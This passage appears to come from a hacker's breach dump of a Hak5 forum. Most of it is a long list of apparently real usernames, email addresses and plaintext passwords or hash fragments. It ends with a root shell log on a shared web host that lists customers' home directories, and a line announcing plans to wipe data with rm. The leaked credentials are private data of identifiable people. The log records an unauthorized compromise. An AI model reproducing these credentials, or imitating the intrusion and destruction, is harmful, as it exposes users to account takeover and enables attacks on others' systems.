rinzy50 - carcar1
riperape - riperape18
riscoubisope - ZuXlsbS356
rjamesbrown - suprat88
rlocone - rosie2004
r@nger - pass135
roargorcibe - vC8nCCk183
robangmilitary - ang756021
robloos - lovegun
rocknrollache - FhgfgRi135
rocktorrentz - jonny1337#
rodio - hak5org
rodivazzio - dI90r1g134
roguehart - keeler
roguehart - keeler199
romankory - h54kory
r@om - taipei101
romulus - retribution
ronsparks - boodog#&#036;&#33;)
roonie - worldsurvive
rooniiterne - 6NCm4vG723
roopancebrori - Nk090Vu358
roriniho - fender
roriniho - hailxenu
rottenronsrip - IZCgzIF525
rowland007 - bond007
rphilli5 - b0d72cd8cb1c4cc
rphilli5 - ravens1
rphilli5 - Ravens1
rphilli5 - service1
rpimonitrbtch - oWp3kmNGL214VsVUCKQY
rrdphoto - beadgcf
rscoagsgandagof - 2tj8zLI429
rsdbaby - 1357986
rsmithgs - ricsmi20
rsreign - 123456789aA
rtc443 - swordfish
rtcameron - qFgv3Bu165
rubberducky - pointdexter
rubberducky - qwaszx
ruff - mr2009950
ruikgsr - QsEfTh22
ruivinho - gq5VxaAm
runkittyrun - dfdfdf
rustondollutt - QOXRxEb378
ruyrocha - awefoda
ryan1894 - RADIOactive
ryancuddy - green123
ryandoughty - R65wdHaK5
ryanlash - Cosmo8764
rybinske - 5673421
rybrian - wpUVbBe166
sablefoxx - svg809jH%
sadisticangel - 1foxy534
safierdrgn - celtic
sakutonosai - CHEERSAAW264
sakutonosai - NNJ264PURREF1963
sandwich_bandit - 07ee77e76c6ce57
sandy - 88a53349dc3ca95
sandystars111@gmail.com - 88a53349dc3ca95
sandystars111@gmail.com - sandy
sandystars111@gmail.com - sandystars
sanity - ilikebigtits
sarakortnewsmi - P71HT2b529
saturnu - asdasd
saustin - swisspwn
sbsoxuv - QsEfTh22
sbyt - sbudemru
scarecrow - zorlac77
scheissa88 - Wayne888
schuchwun - 2948440
scolly - HardSoftLine1426
scorpion - minidisc
scorpion - warren
scotty - 12kin73
scotty2dogs - 12kin73
scottyp - 12kin73
scrapheap - robo56
scrapheap - robo56robo56
screechrat - 7UBasTard
scrib - E1x0r499
seabsrees - x6lfvmN585
seacreep - michnugget
searsloi - eIQbYld884
seempoort - aob3Wjs573
seerficlege - BloUWrD183
seewegiax - wXpUUbF846
seiken - 6d7abbf50db47f7
seikenx - xx8xx8
seiquesnincaw - 6bdd4wwss54
sem1845 - soccer
sentry40 - LCD575MS
seoflow - 4FR0FYd745
sep332 - rhl62s
serganator - 48eaf3f8f10eefb
serganator - 940dce1257e05c0
serganator - a71657a5a504de5
serganator - serverha
sergantor - serverha
serialixer - VcRqHeU883
sermexusesque - zdqnTn4558
seshan - gameboy1
seshan - jaded753h
setone - okse929a
severedspirit - mutter
sexe gratuit berateekuteta - tB6Bhyj424
sexloveacaisexytrim - Qh0rjBN383
sexyacaiberryilovethem - QUfPzTb699
sforzando - carpet
shackerdueon - 32saadaz
shadewolf - briannva
shadow1100mfp - disturbed1
shadygrass - b33abe01eeeb8d2
shantikeredex - k7cangmox
shapework - 123456
shaunl - gQ5Eh7k322
shawty - 81ee8c96b44468e
shawty - outside
sheeskshone - l2VBXqE585
shelleyrubic - ike02banaA
shexperve - 46BdGy6758
shieldsa - solomon
shift1otact - R
shift - 2a85a184faaa74b.
shift - 2a85a184faaa74b
shift - 44682579
shiftline - R1otact
shift - R1otact
shift - R1otact99
shift - R1otact99&#33;
shift - R1otat99
shift - R1tact
shodanime - anime1
shodanime - tavarez1
sholl - lol101
shonen - Linux@1
shoodsavabs - DSRRa8K937
shoowldoold - jIGFClZ226
shorssmant - S5osoda893
siaiffy - hotmailr
sifi_guy@yahoo.com - t0day6
sigge - g503a7
signalhacker - oogy8484
signal hacker - OOgy8484&#33;&#33;
signalhacker - OOgy8484&#33;&#33;
signorinicoco - 222333444555
silcm - Triglav111
sildenafil citrate - 1234567qq
silentarts - shamster15
silentknight329 - 1Gravity329&#33;
silverches - mamago12
simcon - Simconrules123
simonezo - 6C2Dvfy136
sirena_light - 123456789
sirloxelroy - 118294
sismenrinee - hKRLx2r278
sisolanda - Asdfg
sissabitlysobadia - AjX95vb413
siv - peei5wpeei5w
sizabsorbbubs - 7T4q7Q3116
sizanaxag - J0klhte826
sizlush - QsEfTh22
sjbwiii - ------
sjbwiii - qazwsx
sjones411 - coolcow
sjsharksfan - jis420247h5
skekshofgreef - 73dbb5N921
skizz - ------
skizz - retool1
sklein128 - c4a0s
skolor - wil135
skolor - wil135135
skydriver - matrix
skydriver - ronnymatrix
skynetbbs - dragonball
skywise - baggins
slashdot1987 - yahoosucks
slayerdwb - anyanka
_sleeper_ - stefoto
sleeper - stefoto
sleftduts - 6GOPpmF816
slesyevep - 9twsmJa596
slinybrincils - DWV0CTy769
slissecom - su8uBBo758
sluspimiamumb - rYQ4w5p346
smafsmalp - ZnSEpUl231
smashie - gwynne
smashing - t00lman1980
smessarmymn - ZINnlXr414
smiosere - Q9lHXS4653
smoke_007 - tazman2
smonsogue - IG4yEbQ974
smonsogue - k1NwiSW479
smonsogue - zhUY8Dd173
smoorpattibra - WrPTfCl418
smoothcriminal - 467f50ff554df59
smoothcriminal - coke4man9
smoothcriminal - dellboy9
smoothcriminal - psp4ever9
smpreston162 - voyager
smpreston - voyager
smpreston - voyager74
smslca - alardumas
smunro622 - Mastiff03
smunro - Mastiff03
snakerdlk - Deadlock
snakey - samisajew
snakey - snakdog
sniper7kills - 8456162923
snowwhite - OlDa1Hg629
snubs - ch1b1n3k0
snydez5320 - Michael3
soamgaimi - adkj0ro569
socio386 - 3077
sockbr - lessa82
sockchampion - ERmbgYV569
socket1 - acfn147
socket1 - acfn1478
soddarkangel - derfump777
softwhite - APKQjzL488
solexious - dream1001#
solexious - dream1001
somasethsx - asda2zaasd
some_nob - nobb13
somethingothcatwith - hak5@somethingtochatwith
somethingtochatwith - hahk5@somethingtochatwith
somethingtochatwith - hak52somethingtochatwith
somethingtochatwith - hak5@somethingtochatwith
somethingtochatwith - hka5@somethingtochatwith
somken - cfumecha
sonicboom - lol101
sonoundotte - RzeVmzl566
sophiedanter - ld0jzx2869
sorgablue    - wrinkles
sorgablue - wwwwww
sorninnossy - SL1X9h1815
sotjeomsuntotres - Wawstiva
soul_786 - aashna143
soulbleed - 55296d5bcb1acc2
soul - cannibas
soul@graph-x - cannibas
soundguymike - 8a319d1665
soundguymike - b4d85edf199eaff
soundguymike - cocacola
soundguymike - cocacola1
soupdog50 - W1dg3t007
southsea13 - zou121
sp41t3r - omurfatma
spacebison - plop
sparda - kNgWva5D3JjbI2
speadlels - tUTAiK5252
speed13327 - speed327
speed327 - speed327
speeding ticket texas city texas - gBGrvge231
speelauncep - l8xz6by797
spek - loluwt0mg
spekops - dc67b169d9c798b
spekops - loluwt0mg
spekops - lolwut0mg
spelynok - 6576780
spemsnupelasp - 5vkbfsI844
spiff - darkmage45
spiffwalker - darkmage45
spiguoulp - 2TzC3i3473
spikie22 - Timothyg
spikie22 - wweq
spikie22 - WWEQ
spirescu_mihnea - spiremvp01
spliff66 - Megaupload
spoorroky - IZCgzIF525
spoumpima - RvASG0A115
spoungewwweee - 2rd6KFN198
spreadofdarkness - scipiorox
sqeeek - mmfrji
squa7ch - 4ssh0l309
squa7ch - asshole09
squirrelrevolution - ZARN82rwl
sraveesh - nannymom
ssmithisme - welcome
ssmithisme - welcome123
ssmithsime - welcome123
ssmtihisme - welcome123
stacked - monitor1
stacked - Monitor1
stalkerh - Ghost12
stanly34 - p@ssword
stanni - thomas15
star6night - kitty12kitty
starchypizza - coppe0r3
starchy[pizza - copper03
starchypizza - copper03
starchypizza - COPPER03
starchypizza - coppr03
starffarf - ij6miif974
starstarchypizza - copper03
starstorm - popcorn7
stealth1029 - dinosaur
stealth - dinosaur
stealth - dinosaur27
steed77 - mustang
stefanthechunk - binladen94
stefsfut - 147852
stephenc - swimming
stestestoored - 7dF95Ic334
steueroasen - J0OwGBd481
steve51184 - 5242322
steve51184 - 52423222
stevedsd - APresentFromWales
still learning - hotness
still learning - hotness&#39;
stimeser - 6756764
stingwray - cv45df12
stmlspw - OXzjPrG748
stow - envision
strife25 - zandell
strollers travelsd - GnhYxz2362
stroybeans - sdkjl43jkl
stryker0808 - mikevistacom
strykerszero - 123456789
stuntlcdd@hotmail.com - speed01
stuntlcdd@hotmail.com - speed01stun
stuntlcdd@hotmail.com - Speed01stun
stutte - speed01
stutte - speed01stun
stycleoptonse - FknLTGC883
sublime106 - kick@&#036;&#036;
sublime106 - kickass
sublime360 - powderfinger
subtrimbdub - XU6I9yp857
subzero7 - subseven1
subzero7 - subzero
sucker - sucker
suecedearve - 112B5X3297
suensnite - rTitunR948
suiluence - ADRpT3l798
sukae - 4815116
sukae - thryoey
summersun - REvhqCV736
superhyperduck - chicken
superhyperduck - rocket
superhyperduck - rocketrocket
supramike - M1tsugt0
supramike - M1tsugt0&#092;
suraku - shipon1
svatera - NSKyvo5553
svetcka - N7PazwZ669
svitlanamozgova - pqeHfDt289
swarovski iordanov - 584585417455
swathe - makeitso
sweareema - yBonbPB385
swfu - m1n1d1s
swfu - m1n1d1sc#
swfu - m1n1d1sc
swossediuntee - ZnPdQOT995
syale - b299c031e53d555
syale - dasmix
syb3rn1nja - 4321Ninja1234
syber_jedi - PCTools
syko - supsup
symnsmeni - SL1X9h1815
synergy.xrx - synergyx
synergyx - synergyx
syntax - harrpotter975
syntax - harrypotter975
synthesetic - cal8c@tt
sypescefs - ybU2SGw698
syphon - *23P%GWtUPST2jQ&auUB7j542
syphon - 9P354GMz&ZPw%T8a258Q3%V@F
sysops - 6&#33;2@C0M&#036;
t0nto - g33k&#036;qu@D
t0p - slithy-toves
t&#39; or 1=1 - floydo
tabath - sianhelen
tabor - bikini
tactix - existence
taiyed14 - ------
taiyed14 - p3i14ah
taiyed14 - p3i14ah&#33;WH8
taiyed14 - p3i4ah
taiyed - p3i14ah
takendown - k1(k3d
taketst - VcRqHeU883
takgmlm - QsEfTh22
talelumma - Jii8KGu742
talickladtiundev - timosha
talimaydeva - timosha
taliogladius - fuckoff
tamoneya - bu83Akus5e
tanamiksa - gIShi5B997
tape - BENDECHO
tarbizkit - ------
tarbizkit - Notepad111
tare - tare
tasemunse - 0ui8Hxy312
taubin - carlos
taurlertedo - klW8q5X926
tawfragthse - zxczxc
taxfrariflier - 8AUuksot1qa2
tbhaevd - QsEfTh22
tbobo05 - viewmail1&#33;
tcstool - getbit&#33;1
tdenbow - 44nubs
tdr - openlink
teapot - JumBoTron4
techcentric-nick - mathman
techflavor - Fla5534
techknology - Apple944&#33;
techlife - n3veragain
techlife - N3veragain
techno - 4e1ce105253b578
techtronic - q6x5l49a
techtronic - q6x5l49s
teellopay - waIH43K123
teeptvakwag - Sd2nphh719
teetipsemypep - HWwpLXH776
tefybaez - 004711188877
tekknoxpresso - 66eec74fc2ae965
tekknoxpresso - 66eec74fc2ae965
tekknoxpresso - alie82t8589
tekknoxpresso - alie89ty
teledyme - ki4dx&#036;
tempnode - 8fruzelh
tempnode - tempnode
tempnode - whafswada
teniekabolduc - test123
tennesseetony - tennessee
tennesseetony - Tennessee
terrancel - AHmtBDP846
tertdortelf - Fa6SKui776
teslafreak - naraku
test - lol
test - test
tetrasoft - @james2007#
tfhwaftds - zxczxc
th3bigguy - M477k3ll3r
thaidog - C4wP2S7N
tharindu1 - 258459
tharindu1 - 25849
thatsashok - ashok123
the0f - ------
thebesth2o - hitman
thebombjoe2 - madman
the_brein - cannibal
thecircusb0y - random
thecrabman - ZXYCO3m713
thedude - carlos21
the_ethan - martyr
thefoneguy - ech0ech0
thefu - fuyou32
the_ghost - mqWpl3ev
theghost - patrik85
thegodfahter - 999021
thegodfather - 555421
thegodfather - 999021
thegodfather - Bb999021
thegooman7 - 862iE5A89
thehermit - 192Ph0en1x793
thehermit - Kb18243133
thekoalabear - antivirus1
the koala bear - winamp
themaster133 - hallo
themaster133 - hallo1
themaster133 - hallo133
thenastyboy - d62347da0d45642
thenastyboy - g0belin
thenickoslugernovs - 123qweasdzxc
the s0rr0w - 121191
theskinut - JLktSUN339
the sorrow - 121191
the sorrow - 121191opfefvb
the sorrow - opfefvb
thez - ------&#33;
thez - DzaethD&#33;
thez - DzaethD&#33;1
thezero - volcom87
thoku - ohmoh8oh
thoku - wfjmdw
thones - glidepoint
thor - 771173970ca1715
thor - Marines&#33;1Vinson0)
thrawnis - passpass
thrawnis - passpass1
thrawnis@thetruesource.com - passpass
thumbtak - fartveryloud
thundercall - SplinterCe11
thuriya - Ilovejava2
thydaytheda - oBfizhe971
thyvgjszcrn - zxczxc
tiebrfm - QsEfTh22
tiedgetosyday - XcNvjxq441
tiefpunkt - 78b7f3bb810843b
tiefpunkt - amesads
tiefpunkt - amesads5h
tiefpunkt - amesads5kah
tigekiffgyday - nc4QJji636
tihwvlx - QsEfTh22
timmo - 345twest
timmychang1337 - euniceismypurpose
timvangehugten - 12102007
tim.vangehugten - happy666
timvangehugten - happy666
tim.vangehugten - happy6666
tistchaisse - m8O6Aq2281
titcythicelit - fdnDGW5863
tjwlaxz - QsEfTh22
tkitchen - preludesh1999
tnnnrll - QsEfTh22
tocamownencom - cKpnNg6656
toldoffiz - 28CDGg5226
tomatoslayer - int3heye
tomatoslayer - K8jh5wb9
tomatoslayer - K8jh5Wb9
tomatoslayer - oqIv9jsT
tomatoslayer - Q8UY3ezs
tomatoslayer - wRe9r7dR
tomatoslayer - wRE9r7dR
tomkins - JiA"hx9+
topsgebsigree - gmHq3lK586
torgo - mst3k
torrent king - athens2004
torrentking - athens2004
torrentking - leethax
torrent king - mercvslr
torvald - sikko24k
~total_blackout~ - madman
totalblackout - madman
tp2000ng - cjesus
tp2000ng - cjesus123
trajik - Man246
trajik - Manpower246
travisharder - 243428
trc202 - 12195
trc202 - theodore
trelgak - 21391
trelgak - dt19312
trelgak - dustin_tran
trelgak@gmail.com - dt19312
trelgak - qwerty19312
trelis - Isena@12L
trentbaus - uncl3t1m
tridenttry - Trusty1
tritrepephowl - vtSulDs939
trlfsuall - OXzjPrG748
troy7548 - herky_jo1
trucculouth - K4PkLtA934
truelady - U9MpqTPz
truvuxltoniz - VXI1vQa394
tsujigiri - Pee_45
ttvkpddev - timosha
tucker973 - starwars
tuttbiowrub - oxnaSba712
tvcase - m1x3l123
tweakmode - cookie
twenty1 - thisboyhere
twihoorgo - tNVGj42214
twist3r - mYiksMY3ra
tybenteeepits - dCR95CN648
tymac94 - peyton6608
tymac94 - Q886suH9wmFOJA6lrZ4R
tymac94 - Tymac94
tymad95 - D1ckB1lch&#33;
udi - ajk04122000
udii - ajk04122000
uflatamer - D7IQw2H232
ugbyfbs - QsEfTh22
uiqusyl - QsEfTh22
ulbllah - QsEfTh22
ulokjxp - QsEfTh22
unasoto - unbrovo
unasoto - unbrovo1
uncle toxie - efh4707
uncletoxie - efh4707
uncozydonna - 8fpO8w2413
underhole - rugby4life
unfilully - s578XCd678
unicheincutle - coh2YnS861
unn0129 - fckgwrhqq2
unsodotophene - zdqs7SI687
unsusheds - c6RWS1u756
unwimetwigree - XGs18dU413
uplinnadink - ETf3A9f898
urbankiwi - 1nd1g0&#33;&#33;
usammawat - XSp8eZ3578
usarmaaccerry - ICohq1J758
usbhacker - iforget
usbhacker - Securep@ss9
user name - ------
usernamehere - thisisthepasswordofjesus
usernamehere - thisjesus
user name - matt
useseelemijet - mGdE77y763
utahluge - descentwar
utahlugers - descentwar
utissehes - H5R0S7l879
utteridiofe - Bm11NFi244
utvyckj - QsEfTh22
uuh17 - mnNDq7U132
vako - c9aYeh6wuVAs4aCen4dR
valdezarox - YcidNUH512
valdobary - 19641964
valdobary - ObUVI99842
valinhorn - W3lc0me1
valkyries - dbd5e83ed8b4d90
vampyr - 11111q
vanguard - jco4ld539
vapacanny - A5Kp267892
varun - ------
vavaloclazy - LLXJqXL311
vavovu - Z10x05c72
vbyqyig - QsEfTh22
vdelkpi - QsEfTh22
vector - 987654321
velcrow - 1ml33t
vendella - garbage23
ventlavydet - WIgxtwr664
veraprah - 675555
verata - brainstorm99
verhakecttema - qwwqwq777
versiebuf - Y7OEJ4b895
vflexs - password
viagraonli - Kj7Gt65F
viagraonly - Kj7Gt65F
viagra patient information  - uujJBrC519
vickiwong - 17217255254
vickiwong - 75996886
vigrxplusreviews - boston123
vigrxplusreview - wn03OQR454
vikasghavate - vikidude
vinnythespy - igotfs
vivek.ramachandran - abc123321
vivianopoluoff - 4eC5aeS129
vladdrac - 123qwe29&#33;
vnkitecom - n147n147
vodiaxdor - ZEUY94u949
vodka iordanov - jkgjhg584585417455
vofred - JQw92fH324
voksdassy - ASVjHPD165
vonyoptothbom - 1yxnDJd963
voodootorture - iknowyoucanreadthis
voodootorture - iknowyoucanreeadthis
vote4bush - imaskater
vpgregory - USNuwTm382
vrwarp - c0sm0s
vtolfreak - xdgxcjnxd1
vxmichael - we0U2Kh294
vylan4night - Databit11
vylan4night@hotmail.com - Databit11
vylan4night - QuantumCrypt89
vysis - 3musketeer
wachbusuara - QLz2kqe914
wandering - looter
wapko - 24682324d0dae49
warezxxx - qwerty
washington678 - firefox123
waspexceeve - 123456
wayncmaycle - AALz64i247
wazkidwass - thesunism
wazkidwas - thesunism
wdbyghbxrgg - zxczxc
wdhcfjawft - zxczxc
wearnewheerge - zLKY5KO264
webhostbudd - x5BoKelV5VXv
weddingmissis - 7TrgtHD519
weesh68 - duffer
weesh - duffer
weimatott - 6Fp2hCC686
wessaciseewly - nc4QJji636
wessonart - 8OVjF06759
westside - westside
wetelectric - 575113f216f152f
wetwork - Hall0w3dp01nt
wetwork - n3tw0rk1ng
wetwork - N3tw0rk1ng
wexqejv - QsEfTh22
wh1t3_f1r3 - 1a1a3c7g5e1a2b3c1a2b
wh1t3_f1r3 - jufjufjuf
wh1t3_f1r3 - user367
whahmeaft - 0prnpwt282
whashymychomo - wCknc3v221
what - what
whedgit - whedgit06
wheelerie - pulQzaD311
wheelnut53 - assbutt
whereishere - iwashere
whereishere - iwashere2
whizzy - chan133
whoisciaradating - 786786786
whoisravensymone - 786786
wholly - wordpass
wickerpatiofurniture - usk0jS8972
wieweet - 33rozen
will-wtf - spamspam
winkelmm - podidae3
winsooniz - 1A7Rk3H438
winstonsmith - westside
winstonsmtih - westside
wireman99 - hotwire
wire - mathnet
wire - sillyoyster
wisntonsmith - westside
wissam - tahraoui2
wm_hunter - potter
wm_hunter - potter1337101
wocmynu - QsEfTh22
wojtefb5 - OXzjPrG748
wolfman2g1 - aim120c
wolfman2g1 - northrop
wolfman - RnQbHJN115
wonderer4711 - fender
woodstriker - 31011982
woogi - passport
woovaoregelef - GSB1C7I447
woummamma - is6OvNe651
wow - calcio90
wrecked - foot5895
wricealteceix - PEan0x8397
wronickiviomi - GjNcdne889
wtfacoconut - netgear
wtfacoconut - netgear1
wuhjeww - QsEfTh22
wwb - nookie
wygbone - can you get in
x5h4d0wx - j000717121426
xakep - 1music&#33;
xamboozi - f8#uf3ch
xamlit - jesus1
xane - elk3428
xcrwbfk - QsEfTh22
xerkitsko - asdf1234
xipher - qs795*ui
xkwafcg - QsEfTh22
xor - falc1138
xrumertest - 123456789
xujal xumal - labrador
xujal xumal - mahmut
xxnirvashxx - ------
xxnirvashxx - D99132
xxumbroxx - 3760504
xxumbroxx - 3889028
xxxusagirlsexxxtt - 123456789
xyzzy - hackbutverify
xzxtransform - fudukePaulita
yamas - da8527aaa0b72f8
yamasthegeek - think
yamas - think182
ycikerabbo - H4k5.0r9P455w0rd&#33;
ygdpzbm - QsEfTh22
yhnuyrhtyp - zxczxc
yickerabbo - H4k5.0r9P455w0rd&#33;
yickerabbo - H4k5.c0mP455w0rd&#33;
yickerabbo - H4k5.C0mP455w0rd&#33;
yickerabbo - H4k5.c0mP455word&#33;
ylkmfse - QsEfTh22
yngdrum - 0501cs
yngdrum - 3e333fc33aae58b
youji213 - 585648
youji69 - 585648
younghartwig - mr_n1c3guy
yourpharmacystoreonline - storeonline123
youssef29 - ireland
yozki - shadow
yrrxfwd - QsEfTh22
yshnrvn - QsEfTh22
yuze - ctlol0614
zavvi1 - alwicn
zavvi1 - kelson
zavvi1 - qbal93079
zavvi - alwicn
zavvi - kelson
zavvi - password
zavvi - qbal93079
zaykomoyoc - au9FnvU651
zaykomoyod - hl2RWui359
zaykomoyoe - X8EmJzn981
zekemann - Lol69.mUh
zekemann - mastermax91
zemundutt - mGdE77y763
zenboomerang - bqDOgnAbhj1HbBnIyool
zenionepielay - L8wu6qI492
zerenornroack - kEA2jK
zerosan - lordzero
zerotech - aleszagar
zester - Spyderman1
zetaavaky - a89qymE667
zgczqmv - QsEfTh22
zhdhutrtjy - zxczxc
zhtjyfryjt - zxczxc
zigzagjoe - omfgpass0
zimmer - *(david)
zimmer - *(djm16)
ziplybrilibox - ZEUY94u949
zippisugslarl - RaG4Svh641
zipx2k5 - internet
zipx2k5 - random263
zircon91 - naNo2tEch
zkhmruw - QsEfTh22
zmwgvwn - QsEfTh22
zohoman - KDcaVBK536
zoliappali - SqcrR1U214
zombo09 - abababab
zoolehofownew - mZYTFoc117
zoos - wfj4w7v
zorratsearork - YLriEgU582
zprime - Metroid6
zqwpqwz - QsEfTh22
zrrrkvf - QsEfTh22
ztvtrpf - QsEfTh22
zubzero - Heia1337
zubzeroo - Heia1337
zuluroot - hotmail
zvhumberto - Ag03XGx218
zvqxzsh - QsEfTh22
zware - qazwsx

// We're ready to uncage the rm shark

root@web02 [/home2/hak5/www/forums]# ls -la /home
total 368
drwx--x--x 60 root	 root	      12288 Jun 29 13:07 ./
drwxr-xr-x 27 root	 root	       4096 Jun 28 19:29 ../
-rwxr--r--  1 root	 root	      32768 Jul 12 03:14 aquota.user*
drwx--x--x 15 azsmile	 azsmile       4096 Jun 30 00:10 azsmile/
lrwxrwxrwx  1 root	 root		 15 Jul 22  2008 bigrv4le ->
/home2/bigrv4le/
lrwxrwxrwx  1 root	 root		 15 Jul 22  2008 birkett2 ->
/home2/birkett2
drwx--x--x 16 bizpartn	 bizpartn      4096 Jul  7 03:14 bizpartn/
drwx--x--x 13 brannock	 brannock      4096 Jun  8 01:35 brannock/
drwx--x--x 14 calmdrag	 calmdrag      4096 Jun 30 00:10 calmdrag/
drwx--x--x 28 cgerling	 cgerling      4096 Jul 11 20:52 cgerling/
drwx--x--x 14 charming	 charming      4096 Jun  8 22:58 charming/
drwx--x--x 14 chewonth	 chewonth      4096 Jun  9 01:21 chewonth/
drwx------  3 clamav	 clamav        4096 Jul 24  2008 clamav/
lrwxrwxrwx  1 root	 root		 15 Jul 22  2008 comefind ->
/home2/comefind/
drwx--x--x 14 cosmetic	 cosmetic      4096 Jun  9 08:06 cosmetic/
drwxr-xr-x  5 root	 root	       4096 Jul 10 06:07 .cpan/
drwx--x--x  3 root	 root	       4096 Jun  8 01:00 cpbackuptmp/
drwx------  6 root	 root	       4096 Jul 11 06:07 .cpcpan/
drwx------  4 root	 root	       4096 Jul 27  2008 cpeasyapache/
drwx--x--x 17 cpshout	 cpshout       4096 Jun  9 15:25 cpshout/
lrwxrwxrwx  1 root	 root		 12 Jul 22  2008 curly -> /home2/curly/
drwx--x--x 16 dcsguys	 dcsguys       4096 Jun  8 01:21 dcsguys/
drwx--x--x 16 divergen	 divergen      4096 Jun 11 23:23 divergen/
drwx--x--x 14 drfergus	 drfergus      4096 Jun  9 13:31 drfergus/
lrwxrwxrwx  1 root	 root		 15 Jul 22  2008 drkhaksa ->
/home2/drkhaksa/
drwx--x--x 23 ellis	 ellis	       4096 Jun 30 00:10 ellis/
lrwxrwxrwx  1 root	 root		 15 Jul 22  2008 empireim ->
/home2/empireim
drwx--x--x 16 fineberg	 fineberg      4096 Jun  8 01:20 fineberg/
lrwxrwxrwx  1 root	 root		 12 Jul 22  2008 fitzy -> /home2/fitzy/
lrwxrwxrwx  1 root	 root		 15 Jul 22  2008 gamingsi ->
/home2/gamingsi/
lrwxrwxrwx  1 root	 root		 14 Jul 22  2008 habrown ->
/home2/habrown/
lrwxrwxrwx  1 root	 root		 11 Jul 22  2008 hak5 -> /home2/hak5/
drwxr-xr-x  5 hak5darren hak5darren    4096 Feb 24 02:05 hak5darren/
lrwxrwxrwx  1 root	 root		 15 Jul 22  2008 hangover ->
/home2/hangover
drwx--x--x 14 hercules	 hercules      4096 Jun  8 21:59 hercules/
drwx--x--x 13 hfcazc	 hfcazc        4096 Jun  9 20:35 hfcazc/
lrwxrwxrwx  1 root	 root		 14 Jul 22  2008 hterry3 ->
/home2/hterry3/
lrwxrwxrwx  1 root	 root		 14 Jul 22  2008 jmadmin ->
/home2/jmadmin
drwx--x--x 15 judyhuey	 judyhuey      4096 Jun 30 00:10 judyhuey/
lrwxrwxrwx  1 root	 root		 15 Jul 22  2008 justingr ->
/home2/justingr/
drwx--x--x 14 jwbass	 jwbass        4096 Jun  9 20:30 jwbass/
lrwxrwxrwx  1 root	 root		 14 Jul 22  2008 kamerch ->
/home2/kamerch/
lrwxrwxrwx  1 root	 root		 14 Jul 22  2008 kgoblin ->
/home2/kgoblin
drwx--x--x 15 lafayett	 lafayett      4096 Jun  8 11:14 lafayett/
drwx--x--x 25 linuxjoe	 linuxjoe      4096 Jun 26 16:09 linuxjoe/
drwx--x--x 16 logoall	 logoall       4096 Jun 30 00:10 logoall/
drwx------  2 root	 root	      16384 Jul 10  2008 lost+found/
drwx--x--x 12 madera	 madera        4096 Jun  9 01:05 madera/
lrwxrwxrwx  1 root	 root		 14 Jul 22  2008 mattdiv ->
/home2/mattdiv
lrwxrwxrwx  1 root	 root		 14 Jul 22  2008 metdent ->
/home2/metdent/
drwx--x--x 13 milldent	 milldent      4096 Jun  9 01:02 milldent/
drwx--x--x 13 mydtc	 mydtc	       4096 Jun  8 22:18 mydtc/
drwx--x--x 13 mygarden	 mygarden      4096 Jun  8 20:58 mygarden/
drwx------  2 root	 root	       4096 Jun  3 03:15 MySQL-install/
drwx--x--x 22 norton	 norton        4096 Jul 11 20:50 norton/
lrwxrwxrwx  1 root	 root		 11 Jul 22  2008 orga -> /home2/orga
drwx--x--x 15 otokobos	 otokobos      4096 Jun  8 23:17 otokobos/
drwx--x--x 18 paseo	 paseo	       4096 Jun  8 11:17 paseo/
drwx--x--x 18 pcidenta	 pcidenta      4096 Jun  8 22:00 pcidenta/
drwx--x--x 13 pietrzak	 pietrzak      4096 Jun  9 00:58 pietrzak/
drwx--x--x 13 practice	 practice      4096 Jun  9 00:57 practice/
drwx--x--x 14 prospect	 prospect      4096 Jun  9 20:27 prospect/
drwx--x--x 14 qdental	 qdental       4096 Jun  9 08:00 qdental/
-rwxr--r--  1 root	 root	    3212448 May 26 20:17 quota.user*
drwx--x--x 15 recreal	 recreal       4096 Jun  9 08:04 recreal/
drwx--x--x 15 rickdurk	 rickdurk      4096 Jun  8 01:06 rickdurk/
drwx--x--x 20 rvadmin	 rvadmin       4096 Jul 11 06:07 rvadmin/
lrwxrwxrwx  1 root	 root		 15 Jul 22  2008 sadistic ->
/home2/sadistic/
lrwxrwxrwx  1 root	 root		 13 Jul 22  2008 scream ->
/home2/scream/
lrwxrwxrwx  1 root	 root		 14 Jul 22  2008 sethdiv ->
/home2/sethdiv/
lrwxrwxrwx  1 root	 root		 15 Jul 22  2008 sethryde ->
/home2/sethryde/
drwx--x--x 15 sharpsmi	 sharpsmi      4096 Jun  9 01:02 sharpsmi/
drwx--x--x 14 sladellc	 sladellc      4096 Jun  9 08:07 sladellc/
drwx--x--x 15 smilearc	 smilearc      4096 Jul 10 20:40 smilearc/
drwx--x--x 19 soundid	 soundid       4096 Jun 30 00:10 soundid/
drwx--x--x 13 stepsess	 stepsess      4096 Jun  9 01:05 stepsess/
drwx--x--x 16 swelevat	 swelevat      4096 Jun 30 00:10 swelevat/
drwx--x--x 14 swsupers	 swsupers      4096 Jun 30 00:10 swsupers/
lrwxrwxrwx  1 root	 root		 10 Jul 22  2008 tff -> /home2/tff
drwxr-xr-x  3 root	 root	       4096 Jul 11  2008 tmp/
drwx--x--x 12 trunorth	 trunorth      4096 Jun  8 01:19 trunorth/
drwx--x--x 16 valencia	 valencia      4096 Jun  8 22:16 valencia/
lrwxrwxrwx  1 root	 root		 14 Jul 22  2008 viawest ->
/home2/viawest/
drwx--x--x 14 vwpaintr	 vwpaintr      4096 Jun  8 11:24 vwpaintr/
lrwxrwxrwx  1 root	 root		 14 Jul 22  2008 wcars05 ->
/home2/wcars05
drwx--x--x 15 webmedia	 webmedia      4096 Jun 30 00:10 webmedia/
drwx--x--x 19 wmrx	 wmrx	       4096 Jun  9 13:32 wmrx/
drwx--x--x 14 wmrxinf	 wmrxinf       4096 Jun  9 20:28 wmrxinf/
root@web02 [/home2/hak5/www/forums]# cd 
root@web02 [~]# uname -a
Linux web02.divergentnetworks.com 2.6.18-128.1.14.el5 #1 SMP Wed Jun 17
06:40:54 EDT 2009 i686 i686 i386 GNU/Linux
root@web02 [~]# cd /home/hak5
root@web02 [/home/hak5]# ls -al
total 173932
drwx--x--x 25 hak5   hak5	 4096 Jul  2 21:26 ./
drwx--x--x 38 root   root	 4096 Jun 18 00:22 ../
lrwxrwxrwx  1 hak5   hak5	   30 Jul 22  2008 access-logs ->
/usr/local/apache/domlogs/hak5/
lrwxrwxrwx  1 hak5   hak5	   10 Jul 22  2008 anon_ftp -> public_ftp/
-rw-------  1 hak5   hak5	 1544 May  1 19:27 .bash_history
-rw-r--r--  1 hak5   hak5	   24 Feb 22  2008 .bash_logout
-rw-r--r--  1 hak5   hak5	  191 Feb 22  2008 .bash_profile
-rw-r--r--  1 hak5   hak5	  124 Feb 22  2008 .bashrc
lrwxrwxrwx  1 hak5   hak5	   19 Jul 22  2008 cgi-bin ->
public_html/cgi-bin/
